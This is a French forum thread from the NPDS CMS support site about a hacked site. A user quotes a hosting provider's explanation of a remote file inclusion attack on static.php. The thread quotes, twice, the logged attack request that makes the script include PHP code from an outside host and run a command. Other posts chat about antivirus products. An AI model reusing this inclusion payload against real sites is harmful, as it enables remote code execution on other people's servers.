NPDS : Gestion de contenu et de communauté
Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
40 visiteur(s) et 0 membre(s) en ligne.
Autres infos
Activité du Site
Pages vues depuis 25/05/2001 : 108 410 896
- Nb. de membres 8 693
- Nb. d'articles 1 695
- Nb. de forums 26
- Nb. de sujets 8
- Nb. de critiques 92
Index du forum »» Sécurité »» [Résolu] - NPDS hacké !
[Résolu] - NPDS hacké !#10213
13Contributeur(s)
![[-Jarod-]](users_private/[-Jarod-]/[-Jarod-].png "[-Jarod-]")
3 Modérateur(s)
aidadomicil
je crois que je vais changer aussi...sans compter que le norton à installer c'est une vraie galère :|
GiamDoc
Perso j'utilise VirusScan Professional Edition V7 de chez McAfee
Normalement ce lien ça te donne une réduction 10% si cela t'intéresses
http://mcafee.digitalriver.com/dr/v2/ec_MAIN.Entry?CID=72519&SID=39693&SP=10007
Normalement ce lien ça te donne une réduction 10% si cela t'intéresses
http://mcafee.digitalriver.com/dr/v2/ec_MAIN.Entry?CID=72519&SID=39693&SP=10007
GiamDoc
Oui je sais! :-D en fait j'ai pas fini de l'installer et j'ai pas beaucoup de temps... peut-être un peu plus tard.
Anonyme
Ce groupe de hacking que j'ai lu plus haut n'est pas arabe, car je connais l'arabe et ce qui est écrit est plutôt en farsi ( langue perse) donc ce sont des perses et pas des arabes qui hackent :=!
Anonyme
Citation : Anonyme
Oufti ... voici ce que me répond mon hébergeur ...
Bonjour,
,- - [ Le samedi 21 février 2004 vers 15:44 tanatloc écrivait: ] - -
|
> Que voulez-vous dire ?
> Votre serveur s'est fait hacké à cause de certains CMOD 777 placés sur mon
> site ???
|
`- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Il ne s'agit pas pour nous d'un hacking de notre serveur, seul votre site est concerné.
Nous ne pouvons affirmer que l'usage qui a été fait de votre site était un hacking ou une fonction volontaire, mais il est probable à 99% que ce soit un hacking...
Dans le cas du hacking (vous seul savez si l'usage qui a été fait de votre site d'attaquer des tiers est l'usage normal que vous souhaitez pour votre site ou non), cela signifie que certains de vos scripts/pages contiennent des trous de sécurité permettant à des tiers d'en faire un usage différent de ce que vous souhaitez.
Le cas concret mentionné dans le log précité concerne la page "/static.php" de votre site, qui a été appelée de la façon suivante :
/static.php?op=http://hack0.tripod.com.br/cse.gif?&cmd=id
Si vous visitez http://hack0.tripod.com.br/cse.gif vous constaterez qu'il s'agit de code php, qui a probablement été placé en !!include!! par votre script et donc exécuté.
Bien à vous...
Heeeeelp que puis-je faire ??? :-(
Oufti ... voici ce que me répond mon hébergeur ...
Bonjour,
,- - [ Le samedi 21 février 2004 vers 15:44 tanatloc écrivait: ] - -
|
> Que voulez-vous dire ?
> Votre serveur s'est fait hacké à cause de certains CMOD 777 placés sur mon
> site ???
|
`- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Il ne s'agit pas pour nous d'un hacking de notre serveur, seul votre site est concerné.
Nous ne pouvons affirmer que l'usage qui a été fait de votre site était un hacking ou une fonction volontaire, mais il est probable à 99% que ce soit un hacking...
Dans le cas du hacking (vous seul savez si l'usage qui a été fait de votre site d'attaquer des tiers est l'usage normal que vous souhaitez pour votre site ou non), cela signifie que certains de vos scripts/pages contiennent des trous de sécurité permettant à des tiers d'en faire un usage différent de ce que vous souhaitez.
Le cas concret mentionné dans le log précité concerne la page "/static.php" de votre site, qui a été appelée de la façon suivante :
/static.php?op=http://hack0.tripod.com.br/cse.gif?&cmd=id
Si vous visitez http://hack0.tripod.com.br/cse.gif vous constaterez qu'il s'agit de code php, qui a probablement été placé en !!include!! par votre script et donc exécuté.
Bien à vous...
Heeeeelp que puis-je faire ??? :-(